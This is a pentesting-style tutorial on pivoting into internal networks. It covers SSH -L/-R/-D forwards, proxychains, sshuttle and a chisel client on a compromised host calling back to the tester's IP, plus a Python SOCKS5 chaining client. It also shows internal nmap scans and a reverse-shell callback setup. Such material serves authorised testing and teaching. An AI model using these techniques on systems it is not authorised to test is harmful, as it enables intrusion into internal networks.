SSH Port Forwarding & Tunneling
Local, remote and dynamic SSH forwards with a clear which-IP-goes-where guide, plus proxychains, sshuttle and chisel for reaching and chaining into internal networks.
Which IP goes where
In ssh -L localport:TARGET:targetport user@PIVOT:
- PIVOT = the host you SSH into (your foothold).
- TARGET = the internal host, resolved from the pivot's perspective (often 127.0.0.1 or a NET-B IP).
- You then connect to 127.0.0.1:localport on your box.
Local forward (-L): pull one remote port to you
Reach an internal service on your localhost:
ssh -L 8080:172.16.1.5:80 user@<PIVOT> -N
Then browse it locally:
curl http://127.0.0.1:8080
Remote forward (-R): push one of your ports out
Expose your local handler (listening on 127.0.0.1:4444) as port 4444 on the pivot, so a reverse shell from the internal side can call back to it:
ssh -R 4444:127.0.0.1:4444 user@<PIVOT> -N
Caveat: by default sshd binds a -R listener to the pivot's loopback, so only processes on the pivot itself can reach it. For other internal hosts to connect, the pivot's sshd must have GatewayPorts yes (or clientspecified) and you bind explicitly: ssh -R 0.0.0.0:4444:127.0.0.1:4444 user@<PIVOT> -N
Dynamic forward (-D): the whole subnet via SOCKS
Open a SOCKS proxy:
ssh -D 1080 user@<PIVOT> -N
Add it to proxychains:
echo 'socks5 127.0.0.1 1080' | sudo tee -a /etc/proxychains4.conf
Run tools through it (nmap needs -sT -Pn: only full TCP connects traverse a SOCKS proxy, so SYN scans and ping probes never reach the target):
proxychains -q nmap -sT -Pn 172.16.1.0/24
proxychains -q xfreerdp /v:172.16.1.5 /u:admin
sshuttle (VPN-like, no proxychains)
Route a subnet through the pivot (sshuttle needs python on the pivot; add --dns to send name lookups through it as well):
sshuttle -r user@<PIVOT> 172.16.1.0/24
chisel (when you have a foothold but no SSH)
Server on your box (reverse mode):
./chisel server -p 8000 --reverse
Client on the target, exposing a SOCKS proxy back to you (it appears on your box as 127.0.0.1:1080, chisel's default, ready to be added to proxychains):
./chisel client <YOUR_IP>:8000 R:socks
Double pivot
Chain a second dynamic forward behind the first. From a shell on PIVOT (the first foothold), SSH on to PIVOT2 and open a second SOCKS listener; it lives on PIVOT's loopback, not yours (add -f to background it):
ssh -D 1081 user@<PIVOT2> -N
Add the second proxy below the first in proxychains so it chains. This relies on strict_chain (the default in proxychains4.conf), which walks the list top to bottom and asks each hop to connect to the next one, so each address is interpreted from the previous hop's vantage point: this 127.0.0.1:1081 is PIVOT's loopback, reached through the 1080 proxy.
echo 'socks5 127.0.0.1 1081' | sudo tee -a /etc/proxychains4.conf
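To see what proxychains is actually doing with that list, here is a hand-rolled SOCKS5 client that performs the same strict chain: it connects to the first proxy, asks it to CONNECT to the second proxy's address (as the first proxy sees it), runs a fresh SOCKS5 handshake with the second proxy over that same socket, and only then CONNECTs to the real target. It serves both the single -D/proxychains case and the double pivot above. This is an added example, not code from the page or from proxychains or OpenSSH; the two-hop layout, the port numbers and the 10.10.10.5 target behind PIVOT2 are assumptions for illustration.

```python
"""Hand-rolled SOCKS5 CONNECT, single hop or chained (added example)."""
import socket
import struct

SOCKS_VERSION = 0x05
NO_AUTH = 0x00
CMD_CONNECT = 0x01
ATYP_IPV4, ATYP_DOMAIN, ATYP_IPV6 = 0x01, 0x03, 0x04
REPLY_TEXT = {
    0x00: "succeeded", 0x01: "general SOCKS server failure",
    0x02: "connection not allowed by ruleset", 0x03: "network unreachable",
    0x04: "host unreachable", 0x05: "connection refused", 0x06: "TTL expired",
    0x07: "command not supported", 0x08: "address type not supported",
}


def build_greeting():
    """Client hello offering only 'no authentication', which is what ssh -D speaks."""
    return bytes([SOCKS_VERSION, 1, NO_AUTH])


def build_connect(host, port):
    """CONNECT request. A dotted quad goes as ATYP 0x01; any other name goes as
    ATYP 0x03 so the proxy resolves it on the far side (what proxy_dns relies on)."""
    try:
        addr = bytes([ATYP_IPV4]) + socket.inet_aton(host)
    except OSError:
        name = host.encode()
        if len(name) > 255:
            raise ValueError("hostname too long for SOCKS5")
        addr = bytes([ATYP_DOMAIN, len(name)]) + name
    return bytes([SOCKS_VERSION, CMD_CONNECT, 0x00]) + addr + struct.pack("!H", port)


def parse_method_reply(data):
    """Server's chosen auth method; anything but 0x00 means our greeting was refused."""
    if len(data) != 2 or data[0] != SOCKS_VERSION:
        raise ValueError("not a SOCKS5 method reply: %r" % (data,))
    if data[1] != NO_AUTH:
        raise ValueError("proxy wants auth method 0x%02x" % data[1])
    return data[1]


def parse_connect_reply(data):
    """Return (rep_code, bound_host, bound_port) from a complete CONNECT reply."""
    if len(data) < 4 or data[0] != SOCKS_VERSION:
        raise ValueError("not a SOCKS5 reply: %r" % (data,))
    rep, atyp = data[1], data[3]
    if atyp == ATYP_IPV4:
        host, rest = socket.inet_ntoa(data[4:8]), data[8:]
    elif atyp == ATYP_DOMAIN:
        n = data[4]
        host, rest = data[5:5 + n].decode(), data[5 + n:]
    elif atyp == ATYP_IPV6:
        host, rest = socket.inet_ntop(socket.AF_INET6, data[4:20]), data[20:]
    else:
        raise ValueError("unsupported ATYP 0x%02x" % atyp)
    (port,) = struct.unpack("!H", rest[:2])
    return rep, host, port


def recv_exact(sock, n):
    """Read exactly n bytes or raise; SOCKS replies are framed, not newline-terminated."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("proxy closed the connection")
        buf += chunk
    return buf


def socks5_handshake(sock, host, port):
    """One greeting + CONNECT over an already-open socket. Afterwards the socket
    carries the target's bytes (or the next proxy's, when chaining).
    Returns the proxy's bound (host, port); raises ConnectionError on a non-zero REP."""
    sock.sendall(build_greeting())
    parse_method_reply(recv_exact(sock, 2))
    sock.sendall(build_connect(host, port))
    head = recv_exact(sock, 4)
    if head[3] == ATYP_IPV4:
        addr = recv_exact(sock, 4)
    elif head[3] == ATYP_DOMAIN:
        n = recv_exact(sock, 1)
        addr = n + recv_exact(sock, n[0])
    elif head[3] == ATYP_IPV6:
        addr = recv_exact(sock, 16)
    else:
        raise ValueError("unsupported ATYP 0x%02x in reply" % head[3])
    rep, bound_host, bound_port = parse_connect_reply(head + addr + recv_exact(sock, 2))
    if rep != 0x00:
        raise ConnectionError("CONNECT %s:%d refused: %s"
                              % (host, port, REPLY_TEXT.get(rep, hex(rep))))
    return bound_host, bound_port


def socks_chain_connect(hops, target, timeout=10):
    """hops: [(host, port), ...] in proxychains order, first = closest to you.
    Each hop after the first is named as the previous hop sees it (so a second
    127.0.0.1:1081 means the first pivot's loopback). Returns a socket that
    talks straight to target, exactly like proxychains' strict_chain."""
    if not hops:
        raise ValueError("need at least one proxy")
    sock = socket.create_connection(hops[0], timeout=timeout)
    try:
        for nxt in list(hops[1:]) + [target]:
            socks5_handshake(sock, *nxt)
    except Exception:
        sock.close()
        raise
    return sock


if __name__ == "__main__":
    # Assumed layout: ssh -D 1080 on this box to PIVOT, and on PIVOT an
    # ssh -D 1081 to PIVOT2, so the second hop's 127.0.0.1 is PIVOT's loopback.
    # 10.10.10.5 is an assumed host behind PIVOT2, not an address from the page.
    chain = [("127.0.0.1", 1080), ("127.0.0.1", 1081)]
    s = socks_chain_connect(chain, ("10.10.10.5", 80))
    s.sendall(b"HEAD / HTTP/1.0\r\nHost: 10.10.10.5\r\n\r\n")
    print(s.recv(512).decode(errors="replace"))
    s.close()
```

Handy as a chain check: if the first hop answers but the second CONNECT comes back with "connection refused", the -D 1081 listener on PIVOT is not running or is bound somewhere other than its loopback; if it fails with "host unreachable", PIVOT2 cannot reach the final target.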
Rule of thumb:
-L pulls a single remote port to you, -R pushes one of yours out, -D gives you the whole subnet via SOCKS. For multi-hop, stack -D proxies in proxychains (top = closest to you).